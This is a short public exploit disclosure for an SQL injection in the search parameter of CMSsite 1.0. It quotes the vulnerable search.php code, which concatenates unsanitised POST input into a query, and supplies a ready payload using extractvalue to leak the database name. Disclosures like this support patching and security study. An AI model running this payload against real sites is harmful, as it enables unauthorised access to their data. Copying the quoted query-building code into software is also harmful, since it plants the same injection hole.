# Exploit Title: CMSsite 1.0 - 'search' SQL injection # Exploit Author : Majid kalantari (mjd.hack@gmail.com) # Date: 2019-01-27 # Vendor Homepage : https://github.com/VictorAlagwu/CMSsite # Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10 # CVE: N/A =============================================== # vulnerable file: search.php # vulnerable parameter : POST - search if (isset($_POST['submit'])) { $search = $_POST["search"]; } $query = "SELECT * FROM posts WHERE post_tags LIKE '%$search%' AND post_status='publish'"; $search_query = mysqli_query($con, $query); # payload on search text box: ' and extractvalue(1,concat(':',database(),':'))# ===============================================